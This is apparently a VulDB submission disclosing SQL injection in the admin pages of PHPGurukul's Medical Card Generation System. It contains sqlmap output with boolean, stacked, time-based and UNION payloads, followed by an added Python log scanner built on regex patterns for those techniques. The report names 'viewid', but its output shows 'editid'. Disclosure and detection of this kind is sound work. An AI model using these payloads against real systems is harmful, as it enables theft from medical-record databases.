Submission #427404: PHPGurukul Medical Card Generation System - viewid Parameter V1.0 SQL Injection

Title: PHPGurukul Medical Card Generation System - viewid Parameter V1.0 SQL Injection
Description: I would like to report a SQL injection vulnerability I discovered in the PHPGurukul Medical Card Generation System during my testing.

Details:
Affected URL/Endpoint: /mcgs/admin/view-card-detail.php?viewid=1, /mcgs/admin/view-enquiry.php?viewid=1
Vulnerable Parameter: 'viewid'
Risk Level: High (allows malicious users to execute arbitrary SQL queries)

Steps to reproduce:
1) Sign in as admin.
2) Navigate to Managecard > Action 'View'.
3) Use a proxy like Burp Suite to intercept the request.
4) Input the payload to invoke the SQL injection.

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: editid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: editid=1 AND 3139=3139

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: editid=1;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: editid=1 AND (SELECT 5373 FROM (SELECT(SLEEP(5)))VtOj)

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: editid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162717071,0x644d46485475624f4c745a70576f686b4152677175556968674b494d6145446b624a597163747477,0x7178706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[11:02:51] [INFO] the back-end DBMS is MySQL
[11:02:51] [INFO] fetching banner
web application technology: Apache 2.4.59, PHP 8.2.18
back-end DBMS: MySQL >= 5.0.12
banner: '8.3.0'
[11:02:51] [INFO] fetching current user
current user: 'root@localhost'
[11:02:51] [INFO] fetching current database
current database: 'mgsdb'

Please let me know if you need further information or a more detailed analysis.
User: Delvy (UID 74555)
Submission: 21/10/2024 05:03 (2 years ago)
Moderation: 23/10/2024 13:05 (2 days later)
Status: Accepted
VulDB Entry: 281567 [PHPGurukul Medical Card Generation System 1.0 View Enquiry Page /admin/view-enquiry.php viewid SQL Injection]
Points: 17
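A defender-side check for the report above, added here as an example and not part of the submission or of the PHPGurukul project: it scans Apache-style access-log lines for the two admin endpoints named in the report, treats any viewid that is not a plain integer as suspicious (the same test the application should apply before binding the value in a prepared statement), and labels the value with the sqlmap technique it resembles. The log lines, client IPs and the signature list are constructed assumptions, not data from the report.

```python
import re
from urllib.parse import parse_qs, urlsplit
# Admin endpoints named in the report.
ENDPOINTS = {"/mcgs/admin/view-card-detail.php", "/mcgs/admin/view-enquiry.php"}
# Signatures for the four sqlmap techniques in the report; order matters so that
# a stacked "1;SELECT SLEEP(5)#" is labelled stacked rather than time-based.
TECHNIQUES = [
    ("stacked queries", re.compile(r";\s*(select|insert|update|delete|drop)\b", re.I)),
    ("time-based blind", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("UNION query", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("boolean-based blind", re.compile(r"\b(and|or)\b\s*\d+\s*=\s*\d+", re.I)),
]
# Apache common-log prefix: client, identd, user, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def classify_viewid(value):
    """Return None for a purely numeric id, otherwise the technique the value resembles."""
    if re.fullmatch(r"\d+", value):
        return None
    for name, pattern in TECHNIQUES:
        if pattern.search(value):
            return name
    return "malformed viewid"

def scan_log(lines):
    """Return (ip, path, viewid, technique) for every request whose viewid is not a plain integer."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path not in ENDPOINTS:
            continue
        # parse_qs percent-decodes the value; separator="&" keeps ';' inside a stacked payload.
        for value in parse_qs(url.query, keep_blank_values=True, separator="&").get("viewid", []):
            technique = classify_viewid(value)
            if technique:
                findings.append((m.group("ip"), url.path, value, technique))
    return findings

# Constructed sample log lines (not from the report), percent-encoded as a proxy would send them.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Oct/2024:11:02:50 +0000] "GET /mcgs/admin/view-card-detail.php?viewid=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [21/Oct/2024:11:02:51 +0000] "GET /mcgs/admin/view-card-detail.php?viewid=1%20AND%203139%3D3139 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [21/Oct/2024:11:02:52 +0000] "GET /mcgs/admin/view-enquiry.php?viewid=1;SELECT%20SLEEP(5)%23 HTTP/1.1" 200 4880',
    '10.0.0.9 - - [21/Oct/2024:11:02:58 +0000] "GET /mcgs/admin/view-enquiry.php?viewid=1%20UNION%20ALL%20SELECT%20NULL,NULL HTTP/1.1" 200 4880',
    '10.0.0.9 - - [21/Oct/2024:11:03:00 +0000] "GET /mcgs/admin/view-enquiry.php?viewid=1%20AND%20(SELECT%205373%20FROM%20(SELECT(SLEEP(5)))x) HTTP/1.1" 200 4880',
]
```

Calling scan_log(SAMPLE_LOG) flags the four requests from 10.0.0.9 and leaves the plain viewid=1 request alone; the same classify_viewid test, applied server-side before the value reaches a parameterised query, is the control that closes the reported issue.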
